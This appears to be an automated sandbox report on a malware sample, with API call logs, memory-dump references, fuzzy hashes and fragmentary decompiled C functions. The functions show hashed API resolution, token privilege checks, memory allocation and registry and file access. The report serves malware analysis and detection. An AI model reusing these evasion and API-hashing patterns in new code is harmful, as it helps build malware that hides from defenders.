                                                                                                                                                  0x6e9b09f4
                                                                                                                                                  0x6e9b09f6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b0a00
                                                                                                                                                  0x6e9b0a05
                                                                                                                                                  0x6e9b0a0a
                                                                                                                                                  0x6e9b0a29
                                                                                                                                                  0x6e9b0a29
                                                                                                                                                  0x6e9b0a33
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b0a33
                                                                                                                                                  0x6e9b0a0c
                                                                                                                                                  0x6e9b0a10
                                                                                                                                                  0x6e9b0a12
                                                                                                                                                  0x6e9b0a19
                                                                                                                                                  0x6e9b0a19
                                                                                                                                                  0x6e9b0a1f
                                                                                                                                                  0x6e9b0a1f
                                                                                                                                                  0x6e9b0a21
                                                                                                                                                  0x6e9b0a24
                                                                                                                                                  0x6e9b0a24
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b0a21
                                                                                                                                                  0x6e9b0a14
                                                                                                                                                  0x6e9b0a17
                                                                                                                                                  0x6e9b0a1d
                                                                                                                                                  0x6e9b0a1d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b0a1d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b0a17
                                                                                                                                                  0x6e9b0959
                                                                                                                                                  0x6e9b095e
                                                                                                                                                  0x6e9b0963
                                                                                                                                                  0x6e9b0982
                                                                                                                                                  0x6e9b0982
                                                                                                                                                  0x6e9b098c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b098c
                                                                                                                                                  0x6e9b0965
                                                                                                                                                  0x6e9b0969
                                                                                                                                                  0x6e9b096b
                                                                                                                                                  0x6e9b0972
                                                                                                                                                  0x6e9b0972
                                                                                                                                                  0x6e9b0978
                                                                                                                                                  0x6e9b0978
                                                                                                                                                  0x6e9b097a
                                                                                                                                                  0x6e9b097d
                                                                                                                                                  0x6e9b097d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b097a
                                                                                                                                                  0x6e9b096d
                                                                                                                                                  0x6e9b0970
                                                                                                                                                  0x6e9b0976
                                                                                                                                                  0x6e9b0976
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b0976
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b089a
                                                                                                                                                  0x6e9b089c
                                                                                                                                                  0x6e9b0b01
                                                                                                                                                  0x6e9b0b06
                                                                                                                                                  0x6e9b0b09
                                                                                                                                                  0x6e9b0b0e
                                                                                                                                                  0x6e9b0b10
                                                                                                                                                  0x6e9b0b25
                                                                                                                                                  0x6e9b0b28
                                                                                                                                                  0x6e9b0bf6
                                                                                                                                                  0x6e9b0bfe
                                                                                                                                                  0x6e9b0c01
                                                                                                                                                  0x6e9b0c16
                                                                                                                                                  0x6e9b0c20
                                                                                                                                                  0x6e9b0c20
                                                                                                                                                  0x6e9b0c22
                                                                                                                                                  0x6e9b0c24
                                                                                                                                                  0x6e9b0c33
                                                                                                                                                  0x6e9b0c3f
                                                                                                                                                  0x6e9b0c43
                                                                                                                                                  0x6e9b0c46
                                                                                                                                                  0x6e9b0c49
                                                                                                                                                  0x6e9b0c4c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b0c4c
                                                                                                                                                  0x6e9b0b38
                                                                                                                                                  0x6e9b0b4a
                                                                                                                                                  0x6e9b0b4e
                                                                                                                                                  0x6e9b0bda
                                                                                                                                                  0x6e9b0bda
                                                                                                                                                  0x6e9b0be0
                                                                                                                                                  0x6e9b0beb
                                                                                                                                                  0x6e9b0be2
                                                                                                                                                  0x6e9b0be2
                                                                                                                                                  0x6e9b0be2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b0be0
                                                                                                                                                  0x6e9b0b5b
                                                                                                                                                  0x6e9b0b5c
                                                                                                                                                  0x6e9b0b5e
                                                                                                                                                  0x6e9b0b64
                                                                                                                                                  0x6e9b0fb3
                                                                                                                                                  0x6e9b0fb8
                                                                                                                                                  0x6e9b0fba
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b0fc0
                                                                                                                                                  0x6e9b0b7b
                                                                                                                                                  0x6e9b0b7f
                                                                                                                                                  0x6e9b0b84
                                                                                                                                                  0x6e9b0b96
                                                                                                                                                  0x6e9b0b9a
                                                                                                                                                  0x6e9b0ba5
                                                                                                                                                  0x6e9b0ba6
                                                                                                                                                  0x6e9b0ba7
                                                                                                                                                  0x6e9b0ba8
                                                                                                                                                  0x6e9b0baa
                                                                                                                                                  0x6e9b0bb5
                                                                                                                                                  0x6e9b0e2d
                                                                                                                                                  0x6e9b0e2d
                                                                                                                                                  0x6e9b0bb5
                                                                                                                                                  0x6e9b0bbb
                                                                                                                                                  0x6e9b0bc4
                                                                                                                                                  0x6e9b0e3f
                                                                                                                                                  0x6e9b0e55
                                                                                                                                                  0x6e9b0e57
                                                                                                                                                  0x6e9b0e59
                                                                                                                                                  0x6e9b0f94
                                                                                                                                                  0x6e9b0f9b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b0f9b
                                                                                                                                                  0x6e9b0e68
                                                                                                                                                  0x6e9b0e76
                                                                                                                                                  0x6e9b0e90
                                                                                                                                                  0x6e9b0e92
                                                                                                                                                  0x6e9b0e94
                                                                                                                                                  0x6e9b0fa5
                                                                                                                                                  0x6e9b0faa
                                                                                                                                                  0x6e9b0fac
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,150C05FC,150C05FC), ref: 6E9B085E
                                                                                                                                                  • GetSystemInfo.KERNELBASE(?,8E844D1E,8E844D1E,?,?,360D0C74,?,?,1E55AAEC,?,?,C0092A94,00000000,80000002,00000000,-000000FC), ref: 6E9B0C20
                                                                                                                                                  • GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,00000000,150C05FC,150C05FC,00000000,150C05FC,150C05FC), ref: 6E9B0CB4
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.685190249.000000006E9A1000.00000020.00020000.sdmp, Offset: 6E9A0000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.685164563.000000006E9A0000.00000002.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685274294.000000006E9BA000.00000002.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685296966.000000006E9BD000.00000004.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685311272.000000006E9BF000.00000002.00020000.sdmp
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InformationToken$InfoSystem
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 298373132-0
                                                                                                                                                  • Opcode ID: 4a1dc2bb5931151153100d17cb850406fe126dd3816f69e9604b7ad67f7028fc
                                                                                                                                                  • Instruction ID: 7a4ba45bd5a686f4096f31b58741c86d7601aaee3609fa2ab9c588c21499c561
                                                                                                                                                  • Opcode Fuzzy Hash: 4a1dc2bb5931151153100d17cb850406fe126dd3816f69e9604b7ad67f7028fc
                                                                                                                                                  • Instruction Fuzzy Hash: C022C270608341EFE760DAA8CA94BDF77ADAFD1308F108D1CA9948B294EB71D845CF52
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                                  			E6E9B2234(void* __ecx, intOrPtr __edx, void* __esi) {
                                                                                                                                                  				intOrPtr _v4;
                                                                                                                                                  				intOrPtr _v20;
                                                                                                                                                  				intOrPtr* _t5;
                                                                                                                                                  				intOrPtr _t11;
                                                                                                                                                  				intOrPtr* _t13;
                                                                                                                                                  				intOrPtr* _t15;
                                                                                                                                                  
                                                                                                                                                  				_t11 = __edx;
                                                                                                                                                  				if(__ecx == 0) {
                                                                                                                                                  					 *_t15 = 0;
                                                                                                                                                  					_v4 = 0;
                                                                                                                                                  				} else {
                                                                                                                                                  					 *_t15 = E6E9B3AF8(0xffffd8f0, 0xffffffff, __ecx, 0);
                                                                                                                                                  					_v20 = _t11;
                                                                                                                                                  				}
                                                                                                                                                  				_t5 = E6E9B306C(0x60a28c5c, 0x11cab064, 0x60a28c5c, 0x60a28c5c);
                                                                                                                                                  				_t13 = _t5;
                                                                                                                                                  				if(_t13 != 0) {
                                                                                                                                                  					_t5 =  *_t13(0, _t15); // executed
                                                                                                                                                  				}
                                                                                                                                                  				return _t5;
                                                                                                                                                  			}










                                                                                                                                                  APIs
                                                                                                                                                  • NtDelayExecution.NTDLL(00000000,00000000,60A28C5C,60A28C5C,FFFFFFFF,FFFFFFFF,6E9A4B17,00000000,00000000,?), ref: 6E9B2278
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.685190249.000000006E9A1000.00000020.00020000.sdmp, Offset: 6E9A0000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.685164563.000000006E9A0000.00000002.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685274294.000000006E9BA000.00000002.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685296966.000000006E9BD000.00000004.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685311272.000000006E9BF000.00000002.00020000.sdmp
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: DelayExecution
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1249177460-0
                                                                                                                                                  • Opcode ID: 2c9c5e460e6a6f6e58fad2ac9a5298f00f0cc66bf3291dc41720851ba70b474b
                                                                                                                                                  • Instruction ID: e4395cdc306cafc569530e2e1723591fdb215fb215aa1e2fe04141ee1e46a8af
                                                                                                                                                  • Opcode Fuzzy Hash: 2c9c5e460e6a6f6e58fad2ac9a5298f00f0cc66bf3291dc41720851ba70b474b
                                                                                                                                                  • Instruction Fuzzy Hash: BCE065B050E302AEF748D6689C04B6B76DCEFD4610F20C92CB468D7184E770D8018B61
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E6E9B2820(void* __ecx, long __edx, void* __esi, long _a4, long _a8, void* _a12) {
                                                                                                                                                  				long _v4;
                                                                                                                                                  				void* _t8;
                                                                                                                                                  				long _t10;
                                                                                                                                                  				PVOID* _t19;
                                                                                                                                                  
                                                                                                                                                  				_v4 = __edx;
                                                                                                                                                  				 *_t19 = __ecx;
                                                                                                                                                  				if(E6E9B306C(0x60a28c5c, 0x414fdf7, 0x60a28c5c, 0x60a28c5c) == 0) {
                                                                                                                                                  					L3:
                                                                                                                                                  					_t8 =  *_t19;
                                                                                                                                                  				} else {
                                                                                                                                                  					_t10 = NtAllocateVirtualMemory(_a12, _t19, 0,  &_v4, _a4, _a8); // executed
                                                                                                                                                  					if(_t10 == 0) {
                                                                                                                                                  						goto L3;
                                                                                                                                                  					} else {
                                                                                                                                                  						_t8 = 0;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return _t8;
                                                                                                                                                  			}








                                                                                                                                                  APIs
                                                                                                                                                  • NtAllocateVirtualMemory.NTDLL(6E9B88E6,?,00000000,000000FF,6E9B88E6,6E9B88E6,60A28C5C,60A28C5C,?,?,6E9B88E6,00003000,00000004,000000FF), ref: 6E9B2857
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.685190249.000000006E9A1000.00000020.00020000.sdmp, Offset: 6E9A0000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.685164563.000000006E9A0000.00000002.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685274294.000000006E9BA000.00000002.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685296966.000000006E9BD000.00000004.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685311272.000000006E9BF000.00000002.00020000.sdmp
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocateMemoryVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2167126740-0
                                                                                                                                                  • Opcode ID: 1b6e0df76e67549dfb1e774fc107f98af224613b3e03ad2134b0c600fba901d1
                                                                                                                                                  • Instruction ID: 2a96ec58b56977603985ad5c2cdcff7588599ea8c619a4671d157e78548b6b1b
                                                                                                                                                  • Opcode Fuzzy Hash: 1b6e0df76e67549dfb1e774fc107f98af224613b3e03ad2134b0c600fba901d1
                                                                                                                                                  • Instruction Fuzzy Hash: 9EE03971209342AFEB0ACAA9CC24EABB7EDEF84604F108C2DB494C6250D770D8009B21
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 37%
                                                                                                                                                  			E6E9B3138(intOrPtr* __ecx) {
                                                                                                                                                  				void* _t1;
                                                                                                                                                  
                                                                                                                                                  				_push(E6E9B34B0);
                                                                                                                                                  				_push(1); // executed
                                                                                                                                                  				_t1 =  *__ecx(); // executed
                                                                                                                                                  				return _t1;
                                                                                                                                                  			}





                                                                                                                                                  APIs
                                                                                                                                                  • RtlAddVectoredExceptionHandler.NTDLL(00000001,6E9B34B0,6E9B3128,60A28C5C,60A28C5C,?,6E9A6C99,00000000), ref: 6E9B313F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.685190249.000000006E9A1000.00000020.00020000.sdmp, Offset: 6E9A0000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.685164563.000000006E9A0000.00000002.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685274294.000000006E9BA000.00000002.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685296966.000000006E9BD000.00000004.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685311272.000000006E9BF000.00000002.00020000.sdmp
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ExceptionHandlerVectored
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3310709589-0
                                                                                                                                                  • Opcode ID: 6753f1f75caed7ffdcbcd6274eca5e533e05aca448fde9e29cd382457e8bdbfd
                                                                                                                                                  • Instruction ID: e8595ee20177526eaf30cd674b408fcaab563f82489c9f5fb48094f50165e702
                                                                                                                                                  • Opcode Fuzzy Hash: 6753f1f75caed7ffdcbcd6274eca5e533e05aca448fde9e29cd382457e8bdbfd
                                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 78%
                                                                                                                                                  			E6E9B10A4(void* __ecx) {
                                                                                                                                                  				long _v12;
                                                                                                                                                  				void* _v20;
                                                                                                                                                  				void* _v24;
                                                                                                                                                  				long _v32;
                                                                                                                                                  				void* _v40;
                                                                                                                                                  				void* _v44;
                                                                                                                                                  				char _v48;
                                                                                                                                                  				char _v52;
                                                                                                                                                  				void* _v56;
                                                                                                                                                  				void* _v64;
                                                                                                                                                  				void* _v88;
                                                                                                                                                  				void* _v92;
                                                                                                                                                  				int _t33;
                                                                                                                                                  				signed char* _t35;
                                                                                                                                                  				intOrPtr* _t40;
                                                                                                                                                  				intOrPtr _t41;
                                                                                                                                                  				long* _t50;
                                                                                                                                                  				intOrPtr* _t59;
                                                                                                                                                  				intOrPtr* _t65;
                                                                                                                                                  				void* _t66;
                                                                                                                                                  				void* _t68;
                                                                                                                                                  				void* _t69;
                                                                                                                                                  				signed char* _t70;
                                                                                                                                                  				void* _t72;
                                                                                                                                                  				long* _t74;
                                                                                                                                                  
                                                                                                                                                  				_t74 =  &_v32;
                                                                                                                                                  				_t69 = __ecx;
                                                                                                                                                  				_v12 = 0;
                                                                                                                                                  				_t59 = E6E9B306C(0x150c05fc, 0x1da4d409, 0x150c05fc, 0x150c05fc);
                                                                                                                                                  				if(_t59 != 0) {
                                                                                                                                                  					 *_t59(_t69, 8,  &_v12);
                                                                                                                                                  				}
                                                                                                                                                  				_t50 = _t74;
                                                                                                                                                  				 *_t50 = _v12;
                                                                                                                                                  				_t50[1] = 1;
                                                                                                                                                  				if(E6E9AC280(_t50) != 0) {
                                                                                                                                                  					L6:
                                                                                                                                                  					if(_t74[1] != 0) {
                                                                                                                                                  						E6E9ABB44(_t74);
                                                                                                                                                  					}
                                                                                                                                                  					return 0;
                                                                                                                                                  				} else {
                                                                                                                                                  					_t74[6] = 0;
                                                                                                                                                  					if(E6E9B306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) != 0) {
                                                                                                                                                  						GetTokenInformation(_v40, 0x19, 0, 0,  &(_t74[6])); // executed
                                                                                                                                                  					}
                                                                                                                                                  					_t26 = _t74[6];
                                                                                                                                                  					if(_t74[6] != 0) {
                                                                                                                                                  						E6E9AF584( &_v32, _t26);
                                                                                                                                                  						_t68 = E6E9AF4BC( &(_t74[3]), 0);
                                                                                                                                                  						if(E6E9B306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) == 0) {
                                                                                                                                                  							L32:
                                                                                                                                                  							E6E9AF654( &_v32);
                                                                                                                                                  							goto L6;
                                                                                                                                                  						}
                                                                                                                                                  						_t33 = GetTokenInformation(_v40, 0x19, _t68, _t74[7],  &(_t74[6])); // executed
                                                                                                                                                  						if(_t33 == 0) {
                                                                                                                                                  							goto L32;
                                                                                                                                                  						}
                                                                                                                                                  						_t35 = E6E9B306C(0x150c05fc, 0x92f703d0, 0x150c05fc, 0x150c05fc);
                                                                                                                                                  						if(_t35 == 0) {
                                                                                                                                                  							goto L32;
                                                                                                                                                  						}
                                                                                                                                                  						_push( *_t68);
                                                                                                                                                  						asm("int3");
                                                                                                                                                  						asm("int3");
                                                                                                                                                  						_t70 = _t35;
                                                                                                                                                  						if(_t70 == 0) {
                                                                                                                                                  							goto L32;
                                                                                                                                                  						}
                                                                                                                                                  						_t65 = E6E9B306C(0x150c05fc, 0x18603352, 0x150c05fc, 0x150c05fc);
                                                                                                                                                  						if(_t65 == 0) {
                                                                                                                                                  							goto L32;
                                                                                                                                                  						}
                                                                                                                                                  						_t40 =  *_t65( *_t68, ( *_t70 & 0x000000ff) - 1);
                                                                                                                                                  						if(_t40 == 0) {
                                                                                                                                                  							goto L32;
                                                                                                                                                  						}
                                                                                                                                                  						_t41 =  *_t40;
                                                                                                                                                  						if(_t41 == 0) {
                                                                                                                                                  							_t72 = 1;
                                                                                                                                                  						} else {
                                                                                                                                                  							if(_t41 == 0x1000) {
                                                                                                                                                  								_t72 = 2;
                                                                                                                                                  							} else {
                                                                                                                                                  								if(_t41 == 0x2100) {
                                                                                                                                                  									_t72 = 4;
                                                                                                                                                  								} else {
                                                                                                                                                  									if(_t41 == 0x2000) {
                                                                                                                                                  										_t72 = 3;
                                                                                                                                                  									} else {
                                                                                                                                                  										if(_t41 == 0x3000) {
                                                                                                                                                  											_t72 = 5;
                                                                                                                                                  										} else {
                                                                                                                                                  											if(_t41 == 0x4000) {
                                                                                                                                                  												_t72 = 6;
                                                                                                                                                  											} else {
                                                                                                                                                  												_t66 = 7;
                                                                                                                                                  												_t72 =  ==  ? _t66 : 0;
                                                                                                                                                  											}
                                                                                                                                                  										}
                                                                                                                                                  									}
                                                                                                                                                  								}
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  						E6E9AF654( &_v48);
                                                                                                                                                  						if(_v52 != 0) {
                                                                                                                                                  							E6E9ABB44(_t74);
                                                                                                                                                  						}
                                                                                                                                                  						return _t72;
                                                                                                                                                  					}
                                                                                                                                                  					goto L6;
                                                                                                                                                  				}
                                                                                                                                                  			}

                                                                                                                                                  APIs
                                                                                                                                                  • GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,150C05FC,150C05FC,150C05FC,150C05FC), ref: 6E9B1118
                                                                                                                                                  • GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,150C05FC,150C05FC,00000000,00000000,150C05FC,150C05FC,150C05FC,150C05FC), ref: 6E9B117B
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.685190249.000000006E9A1000.00000020.00020000.sdmp, Offset: 6E9A0000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.685164563.000000006E9A0000.00000002.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685274294.000000006E9BA000.00000002.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685296966.000000006E9BD000.00000004.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685311272.000000006E9BF000.00000002.00020000.sdmp
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InformationToken
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4114910276-0
                                                                                                                                                  • Opcode ID: d4114acdae47b760778368f229c105cfa951edf473a092887fb2ca255ca5d737
                                                                                                                                                  • Instruction ID: a565ea6416d2dc1b127dfde209d7e55ed2d91713b310478784b6b1c94f15b4e3
                                                                                                                                                  • Opcode Fuzzy Hash: d4114acdae47b760778368f229c105cfa951edf473a092887fb2ca255ca5d737
                                                                                                                                                  • Instruction Fuzzy Hash: EF410470644242ABEB15D9EEDC24BAF76EC9FD3704F208828FA50CA194DB70C849CF95
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 94%
                                                                                                                                                  			E6E9B57B4(void* __ecx, char* _a4, intOrPtr _a8) {
                                                                                                                                                  				int _v16;
                                                                                                                                                  				int _v20;
                                                                                                                                                  				intOrPtr _t11;
                                                                                                                                                  				int* _t12;
                                                                                                                                                  				int _t13;
                                                                                                                                                  				void* _t23;
                                                                                                                                                  				char* _t35;
                                                                                                                                                  				int* _t38;
                                                                                                                                                  
                                                                                                                                                  				_push(_t34);
                                                                                                                                                  				_t23 = __ecx;
                                                                                                                                                  				_t11 =  *((intOrPtr*)(__ecx + 4));
                                                                                                                                                  				if(_t11 == 0 || _t11 == 0xffffffff) {
                                                                                                                                                  					_t12 = 1;
                                                                                                                                                  				} else {
                                                                                                                                                  					_t12 = 0;
                                                                                                                                                  				}
                                                                                                                                                  				if(_t12 != 0) {
                                                                                                                                                  					L10:
                                                                                                                                                  					_t13 = 0;
                                                                                                                                                  				} else {
                                                                                                                                                  					_t35 = _a4;
                                                                                                                                                  					if(_t35 == 0 ||  *_t35 != 0) {
                                                                                                                                                  						_v20 = 0;
                                                                                                                                                  						_v16 = 0;
                                                                                                                                                  						if(E6E9B3064(0x150c05fc, 0x545b7fe2) != 0) {
                                                                                                                                                  							RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, 0,  &_v16); // executed
                                                                                                                                                  						}
                                                                                                                                                  						_t15 = _v16;
                                                                                                                                                  						if(_v16 != 0) {
                                                                                                                                                  							E6E9AF828(_a8, _t15);
                                                                                                                                                  							if(E6E9B3064(0x150c05fc, 0x545b7fe2) != 0) {
                                                                                                                                                  								RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, E6E9AF4BC(_a8, 0),  &_v20); // executed
                                                                                                                                                  							}
                                                                                                                                                  							_t13 = _v20;
                                                                                                                                                  						} else {
                                                                                                                                                  							goto L10;
                                                                                                                                                  						}
                                                                                                                                                  					} else {
                                                                                                                                                  						goto L10;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return _t13;
                                                                                                                                                  			}












                                                                                                                                                  APIs
                                                                                                                                                  • RegQueryValueExA.KERNELBASE(?,6E9BD1F8,00000000,?,00000000,00000000,?,?,?,6E9BD1F8,?,6E9B5887,?,00000000,00000000), ref: 6E9B580B
                                                                                                                                                  • RegQueryValueExA.KERNELBASE(?,6E9BD1F8,00000000,?,00000000,00000000,00000000,00000000,?,?,?,6E9BD1F8,?,6E9B5887,?,00000000), ref: 6E9B5856
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.685190249.000000006E9A1000.00000020.00020000.sdmp, Offset: 6E9A0000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.685164563.000000006E9A0000.00000002.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685274294.000000006E9BA000.00000002.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685296966.000000006E9BD000.00000004.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685311272.000000006E9BF000.00000002.00020000.sdmp
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: QueryValue
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3660427363-0
                                                                                                                                                  • Opcode ID: 512058fc36bef99c48cd2f7528d3b78eb3ff2add05e720d24adcf44e0688567a
                                                                                                                                                  • Instruction ID: 40cefc674748089374ede031256924050a70919daff6026f3022636076e89f4d
                                                                                                                                                  • Opcode Fuzzy Hash: 512058fc36bef99c48cd2f7528d3b78eb3ff2add05e720d24adcf44e0688567a
                                                                                                                                                  • Instruction Fuzzy Hash: 7C11A27020D305ABD750DAA5EC90EABBBDDEF45754F00881DB59487141EB31E800CF61
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 65%
                                                                                                                                                  			E6E9B5B3C(WCHAR** __ecx, void* __edx, intOrPtr _a4, long _a8, long _a12) {
                                                                                                                                                  				char _v24;
                                                                                                                                                  				void* __esi;
                                                                                                                                                  				void* _t16;
                                                                                                                                                  				void* _t30;
                                                                                                                                                  				long _t37;
                                                                                                                                                  				void* _t38;
                                                                                                                                                  				long _t39;
                                                                                                                                                  				WCHAR** _t40;
                                                                                                                                                  				intOrPtr* _t55;
                                                                                                                                                  				WCHAR** _t56;
                                                                                                                                                  				char* _t59;
                                                                                                                                                  				long _t60;
                                                                                                                                                  
                                                                                                                                                  				_t56 = __ecx;
                                                                                                                                                  				_t37 = _a8;
                                                                                                                                                  				if(E6E9AD1CC(__ecx, 0x2f) != 0) {
                                                                                                                                                  					_t58 = _t60;
                                                                                                                                                  					E6E9AD6D0(__ecx, _t60);
                                                                                                                                                  					E6E9ACFF8(_t56,  *_t60);
                                                                                                                                                  					E6E9ACFDC(_t60);
                                                                                                                                                  				}
                                                                                                                                                  				if(_t37 == 0) {
                                                                                                                                                  					_t64 = _a4 - 1;
                                                                                                                                                  					if(_a4 != 1) {
                                                                                                                                                  						__eflags = _a4 - 4;
                                                                                                                                                  						_t37 = (0 | _a4 == 0x00000004) + 2;
                                                                                                                                                  						__eflags = _t37;
                                                                                                                                                  					} else {
                                                                                                                                                  						_t37 = 1;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				E6E9B62B0(_t64);
                                                                                                                                                  				if(_a4 > 5) {
                                                                                                                                                  					_t58 = 0;
                                                                                                                                                  					if(_t37 != 2) {
                                                                                                                                                  						_t16 = 3;
                                                                                                                                                  						__eflags = _t37 - 1;
                                                                                                                                                  						_t38 = 0;
                                                                                                                                                  						_t39 =  ==  ? _t16 : _t38;
                                                                                                                                                  					} else {
                                                                                                                                                  						_t39 = 1;
                                                                                                                                                  					}
                                                                                                                                                  					if(E6E9B3064(0x8e844d1e, 0x458d3b35) == 0) {
                                                                                                                                                  						_push(0);
                                                                                                                                                  					} else {
                                                                                                                                                  						_t30 = CreateFileW( *_t56, 0, _t39, 0, _t58, _a12, 0); // executed
                                                                                                                                                  						_push(_t30);
                                                                                                                                                  					}
                                                                                                                                                  					_t40 =  &(_t56[3]);
                                                                                                                                                  					E6E9AC26C(_t40);
                                                                                                                                                  					if(E6E9AC280(_t40) != 0) {
                                                                                                                                                  						_t56[2] = E6E9B35F0(0);
                                                                                                                                                  						return 0;
                                                                                                                                                  					} else {
                                                                                                                                                  						if(_a4 == 2) {
                                                                                                                                                  							_t55 = E6E9B3064(0x8e844d1e, 0xba53868);
                                                                                                                                                  							__eflags = _t55;
                                                                                                                                                  							if(_t55 != 0) {
                                                                                                                                                  								 *_t55( *_t40, 0, 0, 2);
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  						_t59 =  &_v24;
                                                                                                                                                  						E6E9B3698(_t59, 0xff, 8);
                                                                                                                                                  						if(E6E9B3064(0x8e844d1e, 0xc5e2981f) != 0) {
                                                                                                                                                  							_push(_t59);
                                                                                                                                                  							_push(_t59);
                                                                                                                                                  							_push(0);
                                                                                                                                                  							_push( *_t40);
                                                                                                                                                  							asm("int3");
                                                                                                                                                  							asm("int3");
                                                                                                                                                  						}
                                                                                                                                                  						return 1;
                                                                                                                                                  					}
                                                                                                                                                  				} else {
                                                                                                                                                  					goto __eax;
                                                                                                                                                  				}
                                                                                                                                                  			}















                                                                                                                                                  0x6e9b5c4a
                                                                                                                                                  0x6e9b5c58
                                                                                                                                                  0x6e9b5cc3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b5c5a
                                                                                                                                                  0x6e9b5c5f
                                                                                                                                                  0x6e9b5cac
                                                                                                                                                  0x6e9b5cae
                                                                                                                                                  0x6e9b5cb0
                                                                                                                                                  0x6e9b5cba
                                                                                                                                                  0x6e9b5cba
                                                                                                                                                  0x6e9b5cb0
                                                                                                                                                  0x6e9b5c61
                                                                                                                                                  0x6e9b5c6d
                                                                                                                                                  0x6e9b5c86
                                                                                                                                                  0x6e9b5c88
                                                                                                                                                  0x6e9b5c89
                                                                                                                                                  0x6e9b5c8a
                                                                                                                                                  0x6e9b5c8c
                                                                                                                                                  0x6e9b5c8e
                                                                                                                                                  0x6e9b5c8f
                                                                                                                                                  0x6e9b5c8f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b5c92
